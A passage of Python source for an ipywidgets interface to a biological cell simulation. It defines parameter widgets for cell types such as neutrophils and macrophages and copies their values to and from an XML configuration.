units_btn.style.button_color = 'lightgreen'
row = [time_step, self.float116, units_btn]
box143 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
div_row33 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row33.style.button_color = 'cyan'
name_btn = Button(description='phagocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float117 = FloatText(value='0.117', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float117, units_btn, description_btn]
box144 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_debris_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float118 = FloatText(value='1.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='relative sensitivity to debris in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float118, units_btn, description_btn]
box145 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_chemokine_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float119 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='relative sensitivity to chemokine in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float119, units_btn, description_btn]
box146 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float120 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='speed after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float120, units_btn, description_btn]
box147 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_cytokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float121 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate of secreting pro-inflammatory cytokine after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float121, units_btn, description_btn]
box148 = Box(children=row, layout=box_layout)
self.cell_def_vbox5 = VBox([
div_row28, death_model1, box130,
div_row29, box131, box132, box133, self.bool15, self.bool16, chemotaxis_btn, self.bool17, box134, box135,
div_row30, box136, box137,
div_row31, box138, box139, box140,
div_row32, box141, box142, box143,
div_row33, box144, box145, box146, box147, box148,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox5)
self.tab = VBox([
self.cell_type_parent_row, explain_inheritance,
self.cell_def_vbox0, self.cell_def_vbox1, self.cell_def_vbox2, self.cell_def_vbox3, self.cell_def_vbox4, self.cell_def_vbox5, ])
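# All cell-type vboxes are stacked in the tab; display_cell_type_default()
# and cell_type_cb() below make exactly one of them visible at a time.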
self.display_cell_type_default()
#------------------------------
def cell_type_cb(self, change):
if change['type'] == 'change' and change['name'] == 'value':
# print("changed to %s" % change['new'])
self.parent_name.value = self.cell_type_parent_dict[change['new']]
idx_selected = list(self.cell_type_parent_dict.keys()).index(change['new'])
# print('index=',idx_selected)
# There's probably a better way to do this, but for now,
# we hide all vboxes containing the widgets for the different cell defs
# and only display the contents of the selected one.
for vb in self.cell_def_vboxes:
vb.layout.display = 'none' # vs. 'contents'
self.cell_def_vboxes[idx_selected].layout.display = 'contents'   # show only the selected cell def
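# (display:'none' removes the hidden vboxes from the flow entirely, while
# 'contents' lets the selected vbox's children lay out as if they were
# direct children of the tab.)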
#------------------------------
def display_cell_type_default(self):
# print("display_cell_type_default():")
#print(" self.cell_type_parent_dict = ",self.cell_type_parent_dict)
# There's probably a better way to do this, but for now,
# we hide all vboxes containing the widgets for the different cell defs
# and only display the contents of 'default'
for vb in self.cell_def_vboxes:
vb.layout.display = 'none' # vs. 'contents'
self.cell_def_vboxes[0].layout.display = 'contents'
# Populate the GUI widgets with values from the XML
def fill_gui(self, xml_root):
uep = xml_root.find('.//cell_definitions') # find unique entry point
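# The XPath position predicates below (e.g. cell_definition[1]) are 1-based
# and depend on the <cell_definition> elements appearing in the same order
# as the vboxes above. A minimal helper sketch that the repetitive fills
# below could share (hypothetical; left unused so the generated code stays
# unchanged):
def _fill_float(widget, xpath):
    elm = uep.find(xpath)
    if elm is not None and elm.text is not None:
        widget.value = float(elm.text)
# e.g. _fill_float(self.float0, './/cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[1]')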
# ------------------ cell_definition: default
# --------- cycle (flow_cytometry_separated_cycle_model)
self.float0.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[1]').text)
self.float1.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[2]').text)
self.float2.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[3]').text)
self.float3.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[4]').text)
# --------- death
self.float4.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//death_rate').text)
self.float5.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//unlysed_fluid_change_rate').text)
self.float6.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//lysed_fluid_change_rate').text)
self.float7.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//cytoplasmic_biomass_change_rate').text)
self.float8.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//nuclear_biomass_change_rate').text)
self.float9.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//calcification_rate').text)
self.float10.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//relative_rupture_volume').text)
self.float11.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//death_rate').text)
self.float12.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//unlysed_fluid_change_rate').text)
self.float13.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//lysed_fluid_change_rate').text)
self.float14.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//cytoplasmic_biomass_change_rate').text)
self.float15.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//nuclear_biomass_change_rate').text)
self.float16.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//calcification_rate').text)
self.float17.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//relative_rupture_volume').text)
# --------- volume
self.float18.value = float(uep.find('.//cell_definition[1]//phenotype//volume//total').text)
self.float19.value = float(uep.find('.//cell_definition[1]//phenotype//volume//fluid_fraction').text)
self.float20.value = float(uep.find('.//cell_definition[1]//phenotype//volume//nuclear').text)
self.float21.value = float(uep.find('.//cell_definition[1]//phenotype//volume//fluid_change_rate').text)
self.float22.value = float(uep.find('.//cell_definition[1]//phenotype//volume//cytoplasmic_biomass_change_rate').text)
self.float23.value = float(uep.find('.//cell_definition[1]//phenotype//volume//nuclear_biomass_change_rate').text)
self.float24.value = float(uep.find('.//cell_definition[1]//phenotype//volume//calcified_fraction').text)
self.float25.value = float(uep.find('.//cell_definition[1]//phenotype//volume//calcification_rate').text)
self.float26.value = float(uep.find('.//cell_definition[1]//phenotype//volume//relative_rupture_volume').text)
# --------- mechanics
self.float27.value = float(uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_adhesion_strength').text)
self.float28.value = float(uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_repulsion_strength').text)
self.float29.value = float(uep.find('.//cell_definition[1]//phenotype//mechanics//relative_maximum_adhesion_distance').text)
self.bool0.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_relative_equilibrium_distance').attrib['enabled'].lower()))
self.bool1.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_absolute_equilibrium_distance').attrib['enabled'].lower()))
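# Note the asymmetry: the mechanics options store their flag in an XML
# *attribute* (enabled="true"), hence attrib[] above, while the motility
# options below store the flag as element *text*.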
# --------- motility
self.float32.value = float(uep.find('.//cell_definition[1]//phenotype//motility//speed').text)
self.float33.value = float(uep.find('.//cell_definition[1]//phenotype//motility//persistence_time').text)
self.float34.value = float(uep.find('.//cell_definition[1]//phenotype//motility//migration_bias').text)
self.bool2.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//motility//options//enabled').text.lower()))
self.bool3.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//motility//options//use_2D').text.lower()))
self.bool4.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate1.value = uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction1.value = uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//direction').text
# --------- secretion
self.text0.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]').attrib['name']
self.float35.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]//secretion_target').text)
self.text1.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]').attrib['name']
self.float36.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]//secretion_target').text)
self.text2.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]').attrib['name']
self.float37.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]//secretion_target').text)
self.text3.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]').attrib['name']
self.float38.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]//secretion_target').text)
# --------- molecular
# ------------------ cell_definition: lung epithelium
# --------- death
self.float77.value = float(uep.find('.//cell_definition[2]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.bool5.value = ('true' == (uep.find('.//cell_definition[2]//phenotype//motility//options//enabled').text.lower()))
# --------- secretion
# --------- intracellular
self.bnd_filenames[1].value = uep.find('.//cell_definition[2]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[1].value = uep.find('.//cell_definition[2]//phenotype//intracellular//cfg_filename').text
self.float78.value = float(uep.find('.//cell_definition[2]//phenotype//intracellular//time_step').text)
# ------------------ cell_definition: immune
# --------- mechanics
self.float79.value = float(uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_adhesion_strength').text)
self.float80.value = float(uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_repulsion_strength').text)
# --------- death
self.float81.value = float(uep.find('.//cell_definition[3]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float82.value = float(uep.find('.//cell_definition[3]//phenotype//motility//speed').text)
self.float83.value = float(uep.find('.//cell_definition[3]//phenotype//motility//persistence_time').text)
self.float84.value = float(uep.find('.//cell_definition[3]//phenotype//motility//migration_bias').text)
self.bool6.value = ('true' == (uep.find('.//cell_definition[3]//phenotype//motility//options//enabled').text.lower()))
self.bool7.value = ('true' == (uep.find('.//cell_definition[3]//phenotype//motility//options//use_2D').text.lower()))
self.bool8.value = ('true' == (uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate3.value = uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction3.value = uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//direction').text
# --------- secretion
self.text4.value = uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]').attrib['name']
self.float85.value = float(uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]//uptake_rate').text)
self.text5.value = uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]').attrib['name']
self.float86.value = float(uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]//uptake_rate').text)
self.text6.value = uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]').attrib['name']
self.float87.value = float(uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]//uptake_rate').text)
# ------------------ cell_definition: CD8 Tcell
# --------- death
self.float88.value = float(uep.find('.//cell_definition[4]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float89.value = float(uep.find('.//cell_definition[4]//phenotype//motility//migration_bias').text)
self.bool9.value = ('true' == (uep.find('.//cell_definition[4]//phenotype//motility//options//enabled').text.lower()))
self.bool10.value = ('true' == (uep.find('.//cell_definition[4]//phenotype//motility//options//use_2D').text.lower()))
self.bool11.value = ('true' == (uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate4.value = uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction4.value = uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//direction').text
# --------- volume
self.float90.value = float(uep.find('.//cell_definition[4]//phenotype//volume//total').text)
self.float91.value = float(uep.find('.//cell_definition[4]//phenotype//volume//nuclear').text)
# --------- secretion
self.text7.value = uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]').attrib['name']
self.float92.value = float(uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]//uptake_rate').text)
# --------- intracellular
self.bnd_filenames[3].value = uep.find('.//cell_definition[4]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[3].value = uep.find('.//cell_definition[4]//phenotype//intracellular//cfg_filename').text
self.float93.value = float(uep.find('.//cell_definition[4]//phenotype//intracellular//time_step').text)
# ------------------ cell_definition: macrophage
# --------- death
self.float96.value = float(uep.find('.//cell_definition[5]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float97.value = float(uep.find('.//cell_definition[5]//phenotype//motility//migration_bias').text)
self.float98.value = float(uep.find('.//cell_definition[5]//phenotype//motility//persistence_time').text)
self.bool12.value = ('true' == (uep.find('.//cell_definition[5]//phenotype//motility//options//enabled').text.lower()))
self.bool13.value = ('true' == (uep.find('.//cell_definition[5]//phenotype//motility//options//use_2D').text.lower()))
self.bool14.value = ('true' == (uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate5.value = uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction5.value = uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//direction').text
# --------- volume
self.float99.value = float(uep.find('.//cell_definition[5]//phenotype//volume//total').text)
self.float100.value = float(uep.find('.//cell_definition[5]//phenotype//volume//nuclear').text)
self.float101.value = float(uep.find('.//cell_definition[5]//phenotype//volume//cytoplasmic_biomass_change_rate').text)
# --------- intracellular
self.bnd_filenames[4].value = uep.find('.//cell_definition[5]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[4].value = uep.find('.//cell_definition[5]//phenotype//intracellular//cfg_filename').text
self.float102.value = float(uep.find('.//cell_definition[5]//phenotype//intracellular//time_step').text)
# ------------------ cell_definition: neutrophil
# --------- death
self.float108.value = float(uep.find('.//cell_definition[6]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float109.value = float(uep.find('.//cell_definition[6]//phenotype//motility//speed').text)
self.float110.value = float(uep.find('.//cell_definition[6]//phenotype//motility//migration_bias').text)
self.float111.value = float(uep.find('.//cell_definition[6]//phenotype//motility//persistence_time').text)
self.bool15.value = ('true' == (uep.find('.//cell_definition[6]//phenotype//motility//options//enabled').text.lower()))
self.bool16.value = ('true' == (uep.find('.//cell_definition[6]//phenotype//motility//options//use_2D').text.lower()))
self.bool17.value = ('true' == (uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate6.value = uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction6.value = uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//direction').text
# --------- secretion
self.text8.value = uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]').attrib['name']
self.float112.value = float(uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]//uptake_rate').text)
# --------- volume
self.float113.value = float(uep.find('.//cell_definition[6]//phenotype//volume//total').text)
self.float114.value = float(uep.find('.//cell_definition[6]//phenotype//volume//nuclear').text)
self.float115.value = float(uep.find('.//cell_definition[6]//phenotype//volume//cytoplasmic_biomass_change_rate').text)
# --------- intracellular
self.bnd_filenames[5].value = uep.find('.//cell_definition[6]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[5].value = uep.find('.//cell_definition[6]//phenotype//intracellular//cfg_filename').text
self.float116.value = float(uep.find('.//cell_definition[6]//phenotype//intracellular//time_step').text)
# Read values from the GUI widgets and write them back into the XML
def fill_xml(self, xml_root):
uep = xml_root.find('.//cell_definitions') # find unique entry point
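# Symmetric writer sketch for the repetitive assignments below
# (hypothetical; unused here):
def _set_text(xpath, value):
    elm = uep.find(xpath)
    if elm is not None:
        elm.text = str(value)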
# ------------------ cell_definition: default
# --------- cycle (flow_cytometry_separated_cycle_model)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[1]').text = str(self.float0.value)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[2]').text = str(self.float1.value)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[3]').text = str(self.float2.value)
uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[4]').text = str(self.float3.value)
# --------- death
uep.find('.//cell_definition[1]//phenotype//death//model[1]//death_rate').text = str(self.float4.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//unlysed_fluid_change_rate').text = str(self.float5.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//lysed_fluid_change_rate').text = str(self.float6.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//cytoplasmic_biomass_change_rate').text = str(self.float7.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//nuclear_biomass_change_rate').text = str(self.float8.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//calcification_rate').text = str(self.float9.value)
uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//relative_rupture_volume').text = str(self.float10.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//death_rate').text = str(self.float11.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//unlysed_fluid_change_rate').text = str(self.float12.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//lysed_fluid_change_rate').text = str(self.float13.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//cytoplasmic_biomass_change_rate').text = str(self.float14.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//nuclear_biomass_change_rate').text = str(self.float15.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//calcification_rate').text = str(self.float16.value)
uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//relative_rupture_volume').text = str(self.float17.value)
# --------- volume
uep.find('.//cell_definition[1]//phenotype//volume//total').text = str(self.float18.value)
uep.find('.//cell_definition[1]//phenotype//volume//fluid_fraction').text = str(self.float19.value)
uep.find('.//cell_definition[1]//phenotype//volume//nuclear').text = str(self.float20.value)
uep.find('.//cell_definition[1]//phenotype//volume//fluid_change_rate').text = str(self.float21.value)
uep.find('.//cell_definition[1]//phenotype//volume//cytoplasmic_biomass_change_rate').text = str(self.float22.value)
uep.find('.//cell_definition[1]//phenotype//volume//nuclear_biomass_change_rate').text = str(self.float23.value)
uep.find('.//cell_definition[1]//phenotype//volume//calcified_fraction').text = str(self.float24.value)
uep.find('.//cell_definition[1]//phenotype//volume//calcification_rate').text = str(self.float25.value)
uep.find('.//cell_definition[1]//phenotype//volume//relative_rupture_volume').text = str(self.float26.value)
# --------- mechanics
uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_adhesion_strength').text = str(self.float27.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_repulsion_strength').text = str(self.float28.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//relative_maximum_adhesion_distance').text = str(self.float29.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_relative_equilibrium_distance').attrib['enabled'] = str(self.bool0.value)
uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_absolute_equilibrium_distance').attrib['enabled'] = str(self.bool1.value)
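# str() on a Python bool yields 'True'/'False'; fill_gui() lowercases the
# attribute before comparing to 'true', so the GUI round trip stays
# consistent even though the XML convention is lowercase.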
# --------- motility
uep.find('.//cell_definition[1]//phenotype//motility//speed').text = str(self.float32.value)
uep.find('.//cell_definition[1]//phenotype//motility//persistence_time').text = str(self.float33.value)
uep.find('.//cell_definition[1]//phenotype//motility//migration_bias').text = str(self.float34.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//enabled').text = str(self.bool2.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//use_2D').text = str(self.bool3.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool4.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate1.value)
uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction1.value)
# --------- secretion
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text0.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]//secretion_target').text = str(self.float35.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]').attrib['name'] = str(self.text1.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]//secretion_target').text = str(self.float36.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]').attrib['name'] = str(self.text2.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]//secretion_target').text = str(self.float37.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]').attrib['name'] = str(self.text3.value)
uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]//secretion_target').text = str(self.float38.value)
# --------- molecular
# ------------------ cell_definition: lung epithelium
# --------- death
uep.find('.//cell_definition[2]//phenotype//death//model[1]//death_rate').text = str(self.float77.value)
# --------- motility
uep.find('.//cell_definition[2]//phenotype//motility//options//enabled').text = str(self.bool5.value)
# --------- secretion
# --------- intracellular
uep.find('.//cell_definition[2]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[1].value)
uep.find('.//cell_definition[2]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[1].value)
uep.find('.//cell_definition[2]//phenotype//intracellular//time_step').text = str(self.float78.value)
# ------------------ cell_definition: immune
# --------- mechanics
uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_adhesion_strength').text = str(self.float79.value)
uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_repulsion_strength').text = str(self.float80.value)
# --------- death
uep.find('.//cell_definition[3]//phenotype//death//model[1]//death_rate').text = str(self.float81.value)
# --------- motility
uep.find('.//cell_definition[3]//phenotype//motility//speed').text = str(self.float82.value)
uep.find('.//cell_definition[3]//phenotype//motility//persistence_time').text = str(self.float83.value)
uep.find('.//cell_definition[3]//phenotype//motility//migration_bias').text = str(self.float84.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//enabled').text = str(self.bool6.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//use_2D').text = str(self.bool7.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool8.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate3.value)
uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction3.value)
# --------- secretion
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text4.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]//uptake_rate').text = str(self.float85.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]').attrib['name'] = str(self.text5.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]//uptake_rate').text = str(self.float86.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]').attrib['name'] = str(self.text6.value)
uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]//uptake_rate').text = str(self.float87.value)
# ------------------ cell_definition: CD8 Tcell
# --------- death
uep.find('.//cell_definition[4]//phenotype//death//model[1]//death_rate').text = str(self.float88.value)
# --------- motility
uep.find('.//cell_definition[4]//phenotype//motility//migration_bias').text = str(self.float89.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//enabled').text = str(self.bool9.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//use_2D').text = str(self.bool10.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool11.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate4.value)
uep.find('.//cell_definition[4]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction4.value)
# --------- volume
uep.find('.//cell_definition[4]//phenotype//volume//total').text = str(self.float90.value)
uep.find('.//cell_definition[4]//phenotype//volume//nuclear').text = str(self.float91.value)
# --------- secretion
uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text7.value)
uep.find('.//cell_definition[4]//phenotype//secretion//substrate[1]//uptake_rate').text = str(self.float92.value)
# --------- intracellular
uep.find('.//cell_definition[4]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[3].value)
uep.find('.//cell_definition[4]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[3].value)
uep.find('.//cell_definition[4]//phenotype//intracellular//time_step').text = str(self.float93.value)
# ------------------ cell_definition: macrophage
# --------- death
uep.find('.//cell_definition[5]//phenotype//death//model[1]//death_rate').text = str(self.float96.value)
# --------- motility
uep.find('.//cell_definition[5]//phenotype//motility//migration_bias').text = str(self.float97.value)
uep.find('.//cell_definition[5]//phenotype//motility//persistence_time').text = str(self.float98.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//enabled').text = str(self.bool12.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//use_2D').text = str(self.bool13.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool14.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate5.value)
uep.find('.//cell_definition[5]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction5.value)
# --------- volume
uep.find('.//cell_definition[5]//phenotype//volume//total').text = str(self.float99.value)
uep.find('.//cell_definition[5]//phenotype//volume//nuclear').text = str(self.float100.value)
uep.find('.//cell_definition[5]//phenotype//volume//cytoplasmic_biomass_change_rate').text = str(self.float101.value)
# --------- intracellular
uep.find('.//cell_definition[5]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[4].value)
uep.find('.//cell_definition[5]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[4].value)
uep.find('.//cell_definition[5]//phenotype//intracellular//time_step').text = str(self.float102.value)
# ------------------ cell_definition: neutrophil
# --------- death
uep.find('.//cell_definition[6]//phenotype//death//model[1]//death_rate').text = str(self.float108.value)
# --------- motility
uep.find('.//cell_definition[6]//phenotype//motility//speed').text = str(self.float109.value)
uep.find('.//cell_definition[6]//phenotype//motility//migration_bias').text = str(self.float110.value)
uep.find('.//cell_definition[6]//phenotype//motility//persistence_time').text = str(self.float111.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//enabled').text = str(self.bool15.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//use_2D').text = str(self.bool16.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//enabled').text = str(self.bool17.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//substrate').text = str(self.chemotaxis_substrate6.value)
uep.find('.//cell_definition[6]//phenotype//motility//options//chemotaxis//direction').text = str(self.chemotaxis_direction6.value)
# --------- secretion
uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]').attrib['name'] = str(self.text8.value)
uep.find('.//cell_definition[6]//phenotype//secretion//substrate[1]//uptake_rate').text = str(self.float112.value)
# --------- volume
uep.find('.//cell_definition[6]//phenotype//volume//total').text = str(self.float113.value)
uep.find('.//cell_definition[6]//phenotype//volume//nuclear').text = str(self.float114.value)
uep.find('.//cell_definition[6]//phenotype//volume//cytoplasmic_biomass_change_rate').text = str(self.float115.value)
# --------- intracellular
uep.find('.//cell_definition[6]//phenotype//intracellular//bnd_filename').text = str(self.bnd_filenames[5].value)
uep.find('.//cell_definition[6]//phenotype//intracellular//cfg_filename').text = str(self.cfg_filenames[5].value)
uep.find('.//cell_definition[6]//phenotype//intracellular//time_step').text = str(self.float116.value)
